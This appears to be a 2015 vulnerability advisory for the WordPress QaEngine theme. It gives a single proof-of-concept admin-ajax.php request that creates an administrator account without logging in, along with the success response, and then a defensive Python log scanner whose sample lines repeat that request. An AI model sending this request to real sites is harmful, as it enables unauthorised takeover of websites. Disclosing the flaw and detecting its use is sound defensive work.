WordPress QaEngine Theme - Add Administrator




#- Title: WordPress QaEngine Theme - Add Administrator
#- Author: A. Samman
#- URL : research.evex.pw/?vuln=10
#- Date: 04/06/2015
#- Vendor: enginethemes.com
#- Download Link: enginethemes.com/themes/qaengine/
#- References :
#- OSVDB : 121267 
#- PACKETSTORM : 131648
#- WPVDB ID : 7885
#- Description : A vulnerability in the QAEngine theme allows an attacker to create an administrator account on the target website.

--------------------------------------------------------------------------------------
Proof of Concept :

http://www.example.com/wp-admin/admin-ajax.php?action=ae-sync-user&method=create&user_login=xADMIN&user_pass=xPASS&role=administrator

Response : {"success":true,"data":{"action":"ae-sync-user","user_login":"xADMIN","user_pass":"xPASS","role":"administrator","ID":5},"msg":"Update user successful!"}
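
For defenders, a log check for the request shown above, as an added example that is not part of the original advisory: it scans combined-format access log lines for admin-ajax.php calls with action=ae-sync-user and rates method=create with a privileged role as high severity. The sample log lines, the PRIVILEGED_ROLES set and the function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request part of a combined-format access log line.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) .*?"(?P<verb>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
PRIVILEGED_ROLES = {"administrator", "editor"}  # assumption: roles worth alerting on

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2015:10:12:01 +0000] "GET /wp-admin/admin-ajax.php?action=ae-sync-user&method=create&user_login=xADMIN&user_pass=xPASS&role=administrator HTTP/1.1" 200 172',
    '203.0.113.7 - - [01/Jan/2015:10:12:09 +0000] "GET /wp-admin/admin-ajax.php?action=%61e-sync-user&method=create&user_login=u2&user_pass=p&role=Administrator HTTP/1.1" 200 170',
    '198.51.100.4 - - [01/Jan/2015:10:13:00 +0000] "POST /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 58',
    '198.51.100.9 - - [01/Jan/2015:10:14:30 +0000] "GET /wp-admin/admin-ajax.php?action=ae-sync-user&method=update&user_login=bob HTTP/1.1" 200 90',
]


def classify(line):
    """Return None for unrelated traffic, else a finding dict (never the password)."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    url = urlsplit(m["target"])
    if not url.path.endswith("/wp-admin/admin-ajax.php"):
        return None
    # parse_qs percent-decodes; like PHP, the last duplicate parameter wins.
    qs = {k: v[-1] for k, v in parse_qs(url.query, keep_blank_values=True).items()}
    if qs.get("action") != "ae-sync-user":
        return None
    role = qs.get("role", "").strip().lower()
    create = qs.get("method") == "create"
    return {
        "ip": m["ip"],
        "status": int(m["status"]),
        "user_login": qs.get("user_login"),
        "role": role or None,
        "severity": "high" if create and role in PRIVILEGED_ROLES else "review",
    }


def scan(lines):
    """Classify every line and keep only the findings."""
    return [hit for hit in map(classify, lines) if hit]


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Parameters sent in a POST body do not appear in access logs, so this only covers query-string requests like the one above. Because user_pass travels in the URL, the logs themselves hold credentials and should be treated as sensitive.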



3xploi7 Team
